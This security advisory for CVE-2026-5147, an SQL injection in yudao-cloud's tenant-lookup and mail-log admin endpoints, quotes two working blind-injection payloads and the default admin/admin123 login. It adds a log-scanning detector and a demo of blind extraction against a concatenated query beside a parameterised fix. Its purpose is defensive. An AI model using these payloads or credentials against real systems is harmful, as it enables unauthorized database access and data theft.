CVE-2026-5147
Status: Received - Intake
SQL Injection in YunaiV yudao-cloud /admin-api Remote Exploit

Publication date: 2026-03-30

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security flaw has been discovered in YunaiV yudao-cloud up to 2026.01. This affects an unknown part of the file /admin-api/system/tenant/get-by-website. Manipulation of the argument Website results in SQL injection. The attack can be launched remotely. An exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Meta Information
Published: 2026-03-30
Last Modified: 2026-04-29
Generated: 2026-06-16
AI Q&A: 2026-03-30
EPSS Evaluated: 2026-06-14
Affected Vendors & Products
Currently, no data is known.
CWE
CWE-89 (Improper Neutralization of Special Elements used in an SQL Command): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
Executive Summary

CVE-2026-5147 is an SQL injection vulnerability in YunaiV yudao-cloud up to version 2026.01. It affects the /admin-api/system/tenant/get-by-website endpoint, where an attacker who manipulates the 'website' query parameter can perform boolean-based blind SQL injection without authenticating.

The injected text becomes part of the SQL statement the backend executes. By submitting conditions that are alternately true and false and observing how the response changes, an attacker can read data out of the database one bit at a time, or alter what the query does.

A related time-based blind SQL injection is also reported in the /admin-api/system/mail-log/page endpoint (the 'toMail' parameter). That endpoint requires authentication, but the report relies on the default credentials (admin/admin123) being left unchanged; data is then extracted by measuring how long the server takes to respond.

Impact Analysis

This vulnerability can have serious impacts including unauthorized access to sensitive database information, data leakage, and potential compromise of the backend database.

Because the injection can be performed remotely and without authentication on one endpoint, attackers can exploit it easily to gather information or manipulate data.

If the default administrator credentials (admin/admin123) have never been changed, the authenticated /admin-api/system/mail-log/page endpoint is reachable as well, adding a time-based blind injection path.

Overall, exploitation could lead to data breaches, loss of data integrity, and disruption of service.

Detection Guidance

Detect the vulnerability by sending the affected endpoints requests whose 'website' (or, for the mail-log endpoint, 'toMail') parameter carries a crafted condition, and comparing each response with that of a benign request.

  • For the unauthenticated boolean-based blind injection in `/admin-api/system/tenant/get-by-website`, send a request such as `/admin-api/system/tenant/get-by-website?website=8.138.89.15:8888'%27AND(IF(06339=6338,1,(select table_name from information_schema.tables)))AND'%27Z` and compare the response with that of a benign value. The payload wraps the condition in an IF() whose false branch is a subquery returning many rows, which MySQL refuses to evaluate as a scalar; a false condition (06339=6338) therefore triggers a database error that shows up as a changed response, while a true one (for example 06339=06339) does not, and that difference is the oracle. Test the true/false pair rather than a single request, and confirm that the quote survives URL decoding on the target, since the published string carries both a literal and a percent-encoded quote.
  • sqlmap automates detection of this injection; point it at the endpoint, restrict it to the `website` parameter, and prefer the boolean-based technique so that it tests true/false pairs in the same way.
  • For the authenticated time-based blind injection in `/admin-api/system/mail-log/page`, after logging in with the default credentials (`admin/admin123`), send a request like: `GET /admin-api/system/mail-log/page?pageNo=1&pageSize=10&toMail='and(select*from(select+sleep(10))a/**/union/**/select+1)=' HTTP/1.1` and time it against a baseline request with a benign `toMail` value; a response that arrives roughly 10 seconds later confirms that `sleep(10)` executed on the database. Repeat with a different delay (for example 5) to rule out network jitter.
Mitigation Strategies

Immediate mitigation: restrict network access to the vulnerable endpoints, in particular the unauthenticated tenant lookup, and change or disable the default 'admin/admin123' credentials so that the authenticated path cannot be reached with known logins.

Additionally, monitor and block suspicious requests that attempt SQL injection payloads targeting the affected APIs.
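As an added example (not from this page or the yudao-cloud project), the following Python script applies the detection guidance above, and this monitoring step, to web-server access logs: it parses Common Log Format lines, restricts attention to the two endpoints named in the advisory, URL-decodes every query parameter, strips MySQL inline comments, and flags the injection markers present in the two published payloads. The log lines are constructed for the example (addresses, timestamps and status codes are invented; spaces in the payload are percent-encoded as they would be on the wire).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Only the two endpoints named in the advisory are inspected; everything else
# passes through so the rule stays quiet on unrelated search boxes and the like.
WATCHED_PATHS = {
    "/admin-api/system/tenant/get-by-website",
    "/admin-api/system/mail-log/page",
}

# Apache/nginx Common Log Format.  Only the request target is dissected; POST
# bodies are not in an access log, so this catches GET-style probes only.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Markers taken from the two published payloads, generalised a little (OR as
# well as AND, BENCHMARK as well as SLEEP), matched case-insensitively against
# the decoded, comment-stripped parameter value.
INDICATORS = [
    ("quote_then_boolean", re.compile(r"'+\s*(and|or)\b", re.I)),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time_delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("schema_probe", re.compile(r"\binformation_schema\b", re.I)),
    ("conditional", re.compile(r"\bif\s*\(", re.I)),
]


def normalise(value):
    """Replace MySQL inline comments with a space and collapse whitespace, so
    the /**/ in ...a/**/union/**/select... cannot hide keywords."""
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value)


def indicators_for(value):
    """Names of every indicator that fires on one parameter value."""
    text = normalise(value)
    return [name for name, pattern in INDICATORS if pattern.search(text)]


def parse_log_line(line):
    """Split a CLF line into client, path, status and decoded query params.
    parse_qs percent-decodes, so %27 and a literal quote both become a quote."""
    match = LOG_RE.match(line)
    if match is None:
        return None
    target = urlsplit(match["target"])
    return {
        "client": match["client"], "time": match["time"],
        "method": match["method"], "path": target.path,
        "status": match["status"],
        "params": parse_qs(target.query, keep_blank_values=True),
    }


def scan(lines):
    """Return one finding per suspicious parameter on a watched endpoint."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["path"] not in WATCHED_PATHS:
            continue
        for param, values in rec["params"].items():
            for value in values:
                hits = indicators_for(value)
                if hits:
                    findings.append({
                        "client": rec["client"], "time": rec["time"],
                        "path": rec["path"], "param": param,
                        "status": rec["status"], "indicators": hits,
                    })
    return findings


# Constructed access-log lines: lines 2 and 4 carry the payloads quoted in the
# detection guidance; everything else about them is invented for the example.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Mar/2026:10:15:01 +0000] "GET /admin-api/system/tenant/get-by-website?website=www.example.com HTTP/1.1" 200 312
203.0.113.10 - - [30/Mar/2026:10:15:02 +0000] "GET /admin-api/system/tenant/get-by-website?website=8.138.89.15:8888'%27AND(IF(06339=6338,1,(select%20table_name%20from%20information_schema.tables)))AND'%27Z HTTP/1.1" 500 97
198.51.100.7 - - [30/Mar/2026:10:16:40 +0000] "GET /admin-api/system/mail-log/page?pageNo=1&pageSize=10&toMail=user@example.com HTTP/1.1" 200 2048
198.51.100.7 - - [30/Mar/2026:10:16:51 +0000] "GET /admin-api/system/mail-log/page?pageNo=1&pageSize=10&toMail='and(select*from(select+sleep(10))a/**/union/**/select+1)=' HTTP/1.1" 200 211
192.0.2.5 - - [30/Mar/2026:10:17:00 +0000] "GET /blog/search?q=sleep(10) HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['client']} {f['path']} param={f['param']} "
              f"status={f['status']} indicators={','.join(f['indicators'])}")
```

Scoping the rule to the two paths keeps it quiet on the unrelated `/blog/search` line even though that value contains `sleep(10)`; widen WATCHED_PATHS or drop the path check if you would rather alert on any admin-api parameter. Because access logs do not carry request bodies, the same indicator logic should also be run from a WAF or application-level log for POST traffic.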

The actual fix is in the application code: bind the 'website' and 'toMail' values as query parameters instead of concatenating them into SQL, and validate their format before use. Because the vendor did not respond to the disclosure, this may require patching the code locally rather than waiting for an upstream release.
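To show concretely how a crafted 'website' value rewrites the query (the mechanism described in the Executive Summary) and why a bound parameter stops it, here is an added Python example; it is not yudao-cloud code (the project is Java, and its real schema is not reproduced) and it uses an in-memory SQLite table named system_tenant, with assumed columns, as a stand-in for MySQL. It places a string-concatenated lookup beside a parameterised one and runs a boolean-based blind extraction loop against each, using the same quote, AND, condition shape as the published payload.

```python
import sqlite3
import string

# Constructed stand-in for the tenant table (assumed names; not yudao-cloud's
# schema, and SQLite replaces the MySQL the product actually runs on).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE system_tenant (id INTEGER PRIMARY KEY, name TEXT, website TEXT)"
    )
    conn.executemany(
        "INSERT INTO system_tenant VALUES (?, ?, ?)",
        [(1, "acme", "acme.example.com"), (2, "globex", "globex.example.com")],
    )
    return conn


def get_by_website_vulnerable(conn, website):
    """CWE-89: the caller's text is spliced into the SQL grammar, so a quote
    in it closes the literal and everything after it runs as SQL."""
    sql = f"SELECT id, name FROM system_tenant WHERE website = '{website}'"
    return conn.execute(sql).fetchone()


def get_by_website_safe(conn, website):
    """Bound parameter: the driver sends the text as data, never as syntax."""
    return conn.execute(
        "SELECT id, name FROM system_tenant WHERE website = ?", (website,)
    ).fetchone()


def blind_extract(lookup, conn, known_website, max_len=32):
    """Boolean-based blind extraction of tenant 1's name through `lookup`.

    Oracle: a valid website normally returns a row; AND-ing a condition onto
    it (quote, AND, condition, then the query's own closing quote) makes the
    row disappear whenever the condition is false.  One character per
    position, the same game the advisory's IF()-based payload plays on MySQL.
    """
    alphabet = string.ascii_lowercase + string.digits + "_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (
                f"{known_website}' AND substr("
                f"(SELECT name FROM system_tenant WHERE id = 1), {pos}, 1) = '{ch}"
            )
            if lookup(conn, probe) is not None:
                recovered += ch
                break
        else:
            # No candidate matched: past the end of the string, or the
            # lookup is not injectable (the safe one never returns a row).
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legit lookup, safe:        ", get_by_website_safe(db, "acme.example.com"))
    print("tautology vs vulnerable:   ", get_by_website_vulnerable(db, "x' OR '1'='1"))
    print("tautology vs safe:         ", get_by_website_safe(db, "x' OR '1'='1"))
    print("blind extract, vulnerable: ",
          repr(blind_extract(get_by_website_vulnerable, db, "acme.example.com")))
    print("blind extract, safe:       ",
          repr(blind_extract(get_by_website_safe, db, "acme.example.com")))
```

Against the concatenated lookup the loop recovers the tenant name "acme" one character at a time; against the bound-parameter lookup every probe is compared as a literal website string, no row ever matches, and nothing is recovered. The Java analogue in a MyBatis mapper is `#{website}` (bound) rather than `${website}` (interpolated into the statement text).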

Compliance Impact

The CVE-2026-5147 vulnerability allows attackers to perform SQL injection attacks on the yudao-cloud system, potentially leading to unauthorized access to sensitive data stored in the backend database.

Such unauthorized data access and potential data breaches can result in non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information against unauthorized access and disclosure.

Therefore, exploitation of this vulnerability could lead to violations of these standards due to compromised confidentiality, integrity, and availability of protected data.
